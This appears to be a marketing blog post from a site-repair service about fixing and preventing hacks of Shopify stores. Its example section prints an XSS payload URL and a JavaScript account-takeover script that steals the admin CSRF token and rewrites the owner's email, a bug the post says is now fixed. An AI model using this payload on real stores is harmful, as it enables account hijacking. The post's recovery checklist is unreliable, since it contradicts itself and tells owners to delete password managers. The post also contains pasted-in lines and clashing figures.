Shopify Hacked – How to Fix a Hacked Shopify Site?

Updated on

Shopify Hacked – FIXED

 fix hacked shopify site - shopify vulnerabilities

In this article, we wont be telling you how to hack a shopify site, but instead you will learn haw to fix a hacked shopify store and further prevent it from malicious malware in 2020. Also know more about shopify security aspects you dint know .

Among all the eCommerce platforms, Shopify is considered as one of the versatile and secure for mid-sized eStores. However, for some time, some security lapses have come in front.

In October 2019, it was discovered that there is a new Shopify Exchange app’s API endpoint with a security flaw that could be exploited to leak thousands of store’s revenue and traffic data.

After discovering that the app was leaking revenue of two stores, further investigations revealed that 12,100 stores were exposed, 8,700 were vulnerable, and 3,400 were expected to have their data public. Shopify acted swiftly and resolved the data leak in November 2019.

After the incident, many precautions are taken and Shopify developers and researchers are working to fix the flaws to ensure the safety and security of the websites.

Shopify has more than 90,000 online stores. Shopify came in 2006 and became a favorite eCommerce platform for the dev community as it requires less coding and provides inbuilt security while doing online transactions.


Before moving further, Dont forget to check out our guides on

Woocommerce Hacked   |   Drupal Site Hacked    |   Fix Hacked WordPress   |   Prestashop Hacked


Shopify Security – Benefits & How they manage it

App Support.  Shopify fully supports mobile apps and keeps track of the other eCommerce and mCommerce platforms. Both free and paid app options will help you cross-sell and upsell, convert more customers, collect email reviews as well as incorporate scarcity tactics, and deliver discount codes.

Fast loading: Shopify websites load fast as compared with other platforms. It offers countless custom themes and templates to choose from to ensure a good brand value.

Super customizable. Shopify has many site builder apps that make the customization a super cool experience for the developers without doing much coding.

Support Many Payment Method integrations: Multiple payment ways like regular credit card payments, PayPal, Amazon Pay, Apple Pay, and many other payment options are available that enhance user experience.

Links to other sales channels. The platform allows us to link you with other sales channels, including social media, Amazon, messengers, etc.

Usability: Shopify is the most user-friendly platform offering attractive themes

Performance: A Shopify enables store has no-stress uptime and runs smoothly providing a good surfing speed

Challenges in Maintaining a Shopify Website:

In building and maintaining a secure online store, there are 3 major things to consider and they are

  •         Credit card data
  •         Customer data
  •         Fraud protection

Let’s get an insight that how the Shopify store manages these challenges:

Security for Credit Card Processing

Shopify is PCI level 1 compliant for credit card processing It means that it adheres to the highest standards of server compliance. PCI compliance means acquiring the best security that’s why there are fewer payment frauds reported for a Shopify website. Moreover, the platform doesn’t allow you to do many modifications in the checkout to maintain payment security.

Ensuring the security of Customer Data

The platform has taken many security measures to secure customer data. Some of them include limiting the login attempts and ensuring app developers only have access to the data they need to run the apps to avoid data being leaked.

Customer data is fully secure in a Shopify store. The only flaw is when you provide the access to a third-party app to grant full access to the store backend via the API. In this case, the app can access the complete database including customer data

Security for Fraud Protection

The eCommerce platform has an inbuilt feature to detect frauds. The fraudulent orders are tagged and reviewed manually.  As it is designed to work for the mid-sized stores, the developer has the option to either manually or automatically set the processing of the order. Whichever way you choose, close monitoring of orders is done before dispatching. The suspicious orders have the address mismatch issue and there are multiple attempts made during the login process. This simple observation can avoid fraud.

Apart from the above precautions, a Shopify site must have an SSL certificate that is included in your monthly Shopify fee. Also, the admin security is practiced as it maintains backend security and prevention from Brute Force attack and other security issues. Some of the common security Issues of Shopify are:

Cross-site scripting – XSS

Shopify normally comes across issues like coding bugs or unapproved third-party content like rogue ads. The main reason is to allow us to use cross-site scripting that causes vulnerabilities. Sometimes, JavaScript from a third-party site appears and performs unauthorized actions.

Sometimes, by mistake when you are enabling your website and running the code through the server, you click an unauthorized link or button that leads to inviting the intruding code runs just by being on the page. Also,  XSS can capture information from forms, alter the content of a page, try to download malware, or send the user to another site.

Browser settings and plugins fail to guard against XSS attempts. They don’t catch all cases. Shopify websites depend on the browsers function to block XSS which sometimes causes security troubles. If you are running regular scans and cleaning the website, it won’t occur.

Recommended Reads:

The WP Shopify XSS bug

WP Shopify plugin is a REST API, commonly used in Shopify websites. It means that requests take the form of URL paths over an HTTP interface. Paths are mapped to functions, and one of them is the update_settings() function. This method can access the authorized login and can change the plugin’s settings.

Since there was no checking method for authorization was defined in the plugin, some of the settings let the user inject snippets into pages. They could contain any kind of JavaScript. This was serious. The hackers used this bug to stick a small piece of JavaScript into a page. It then downloads content from the attacker’s site and injects it into the page. A wide range of actions is possible, depending on what the intruder is after. In most of the cases, the script goes into the page header, where it will run as the page is loaded and, and it redirects the site to another URL by invoking the location.replace() function to redirect the page. The hackers can assign a new value to document.location or window.location in the DOM.

Replacing the page content with a short body and then calling location.replace(). This can make the redirection look more legitimate since the user sees a request to wait a moment. The meta refresh tag will help in the redirection of the page. The HTTP .redirect code can also be inserted for this purpose.

Once it has been inserted, the malicious script will continue to redirect users until it is removed. As long as the vulnerability exists, the attacker can restore removed scripts or change existing ones.

Shopify Site Hacked – Example

 In a Shopify website, the vulnerabilities like privilege escalation, a WP xss’s, and Oauth redirect bypass are already detected and the patches for the same have come in version 2.5 and above. Also, Shopify Plus implements the patches for these vulnerabilities.

However, the possibility of the malware and other security threats is impossible to remove but we can say that Shopify is a much secure eCommerce platform that is easy to implement and have less scope of security hacks.

Here in this example, we are showing how persistent cross-site scripting to take over the Shopify web store. This vulnerability can be easily exploited and any customer/User can take over the shop.

Once a customer purchases from the Shopify store, the purchase will be redirected to the checkout page. The redirection process passes two parameters. There is one parameter called “ referrer”. This referrer parameter tracks the customers, for example, if there is a “buy now” button embedded on http://example.com and a customer clicks on it to buy a product then this referer value is reflected in the admin panel of the shop as shown in the screenshot below.

So to take over the shop, a customer has to simply purchase a product from this address with the referrer parameter set to the payload

https://[victims-shopify-address].myshopify.com/cart/[product-id]:1?channel=buy_button&referer=javascript:alert(document.cookie);

Example:

Note: The details of the example can be viewed on the given link. After reporting this vulnerability Shopify has started using CSP, as an extra measure to protect its customers from this kind of vulnerability. With CSP it isn’t possible to execute the inline script which is available in the updated versions.

var xhr = new XMLHttpRequest();

xhr.open("GET", "https://madamcury.myshopify.com/admin/orders", false);

xhr.withCredentials=true;

xhr.send(null);

var token = xhr.responseText;

var pos = token.indexOf("csrf-param");

token=token.substring(pos,token.length).substr(30,44);

alert(token);

document.write("<html><body><form action= 'https://madamcury.myshopify.com/admin/settings/account' method='POST'>

<input type='hidden' name='utf8' value='â&#156;&#147;'>

<input type='hidden' name='authenticity&#95;token' value='"+token+"'/>

<input type='hidden' name='user&#91;first&#95;name&#93;' value='hacked' />

<input type='hidden' name='user&#91;last&#95;name&#93;' value='hacked'>

<input type='hidden' name='user&#91;email&#93;' value='example&#43;hacked&#64;hotmail&#46;com' />

<input type='hidden' name='&#95;method' value='post'>

<input type='submit' value='Submit form'></form>

<script>document.forms[0].submit();</script></body></html>");

It is to note that this vulnerability is reported to Shopify and they have fixed it  and now it can’t be reproduced.

Consequences of a Hacked Shopify site:

You will start seeing the following issues :

 

How To Fix Hacked Shopify Site – STEPS TO FOLLOW

  • Go to yourstore.myshopify.com/admin/activity and see which user is listed as making the changes
  • Check your recent login history.  Goto Admin>> Settings > Account/Plans and Permissions. In the Permissions section of this page, you’ll be able to see your account name along with any staff accounts you have listed.
  • Click on an account name, you can view the account profile and Recent access to store. This section will display the date, ISP, IP address and location of the login.
  • If you ever notice unusual activity on your account, reach out to our Support Team so that we can look into further.
  • Re create every account, emails & passwords.
  • 2FA enabled only sms.
  • Do not use a password manager – delete it if you are using
  • enable Two-Step Authentication so that even if someone does have your password, they won’t be able to access the account without a pin sent to your phone.
  • but remove email as a backup –
  • download the Google Auth app.

How to prevent Shopify site Hack ?

Shopify has emerged as one of the secure eCommerce solutions as compared with others. Shopify stores might not be a cost-saving solution but good investors opt to use the best one. After all, after so many frauds happening in the online stores, it’s better to go for a secure solution.

Over a while, Shopify’s commerce platform has awarded hackers more than $850,000 in bounties for helping secure its $55 billion-plus customer transactions and data. As a leading commerce platform, the company helps more than half-million merchants to design, set-up, and manage online stores.

The bug bounty program has helped to prevent many hacks and secure the Shopify stores. Shopify launched its initial self-run, email-based bug bounty program in April 2013 with a security team of one: Andrew Dunbar. This month, Shopify celebrates the third anniversary of its bug bounty program.

However, there are certain preventive steps that you can take to secure your Shopify store. They include:

Enforce segregation of duties:

Separate duties, especially for sensitive or shared processes and tasks. This ensures that no individual can complete a single task alone.  For example, in this context, organizations can implement so-called “access zones” to tie the rights a user has to specific resources.

• Establish least privilege:

Assign privileged users just enough and just-in-time access to resources they require to do the job. Leave zero standing privileges to be exploited.

• Implement access request and approval workflows:

Govern privilege elevation with self-service access requests and multi-level approvals, to capture who approved access and the context associated with the request.

• Leverage user and entity behavior analytics based on machine-learning technology to monitor privileged user behaviors.

This will help identify abnormal and high-risk activity, which can be used to trigger real-time alerts or removal of privileges to stop threat actors, whether they are internal or external to the organization.

Secure Payment Options

Shopify offers customers the highest standards of server compliance for credit card processing, which is hard to beat. There are certain changes in the Rest API for the apps that are updating or making changes in the checkout page.

Payment properties

A new property is introduced called next_action to the payment gateway. The field returns an object that includes the redirect_url attribute, which is a URL string.

 "next_action": {

  "redirect_url": "https://shop-domain-url.myshopify.com/:shop_id/checkouts/:token/authentications/:auth_token/3ds"

}

The code specifies the URL that your app or sales channel is sending the customer data to authenticate the payment. Once the data is authenticated, it is sent back to the app or sales channel for order processing.

99.98% Uptime

Shopify is a SaaS hosted solution. This means that your store is hosted on Shopify servers and does not require an additional installation. In doing so, Shopify provides merchants with a 99.98% uptime guarantee. This helps retailers avoid losses due to their store being unavailable during high peak times.

Increased Credibility

As a Shopify store owner, you can display a security badge on your online store to establish trust with your customers. You can link this badge to a description of how Shopify meets Payment Card Industry (PCI) standards.

Security badge: Shopify

Add the security badge code to your online store through the Shopify admin portal. To contrast with your theme’s color theme, you can choose between a light or dark-colored security badge. Since the badges are a .svg format, you can also resize them without sacrificing image quality.

Customer Data

Shopify provides guidelines for the developer community to meet legal obligations. This information ensures that over 1,000,000 merchants, and millions of customers, can trust Shopify with their private information. By taking responsibility seriously, Shopify provides instructions for developers to ensure that user data is kept both secure and private.

The guiding rules for using Shopify are designed in a way that makes it transparent and fair for everyone to use. The platform encourages partners to share the rewards of building on the platform. This also enforces limits and rules that keep things fair for everyone involved.

Admin Security

Shopify’s back end is secure, offering a staff permission system. You can set accounts for each person who can access your Shopify admin. This way, you can help protect your online store from security breaches by enforcing security steps to authenticate and block access.

You can also allow staff to access your Shopify admin, without giving them access to sensitive information. To keep you on track, your staff can stay on top of recent changes, orders, and customer interactions on your timeline.

Hackproof your Shopify Store Security

Shopify is a Safe and Secure Platform for Online Shopping. But while running an online store, we must keep asking the following questions as an admin to maintain the security

  • Is my Shopify Store Secure?
  • How can I restrict hacking of my online store?
  • How can I fix the hacked Shopify website?

As mentioned above, Shopify has PCI compliance and every transaction is protected. The SSL certificates are a must to improve security and trust in your store.  A 99.8% uptime is promised by Shopify Plus, which also influences online store reliability.

As far as shopify hacking is concerned, the online stores are always in the reach of hackers. However, we can take prior security measures such as:

  • Timely backup plan
  • Well managed and updated plugins
  •  Keeping the software updated
  • Managing customer data for malware

Update with the latest patches to avoid vulnerabilities.

But if your Shopify website is hacked, you can inform the host company and fix the code by restoring the older version. But it will be essential to enquire about the loophole fro where the hacker had entered. it can be a bad password, less secure authentication process, bad coding, bad integration with third-party vendors for payments , use of plugin having a vulnerability, network or web host issues, and so on.

In case of a hack, you need to monitor and recheck every possibility from the beginning. For this, you can even hire a professional company like WP Hacked Help that will quickly clean your website.

Wrap Up

Shopify provides a secure shopping experience for its merchants’ customers by keeping their security systems up to date with industry best practices. However, to keep the hackers away from your online store, you can do the following:

  • Maintain a secure network
  • Maintain a vulnerability management program
  • Regularly monitor and test networks
  • Protect cardholder data
  • Implement strong access control measures
  • Maintain an information security policy

This way, you will be able to build your brand and maintain a secure Shopify store providing a secure payment system and customer satisfaction.

Leave a Reply

Your email address will not be published. Required fields are marked *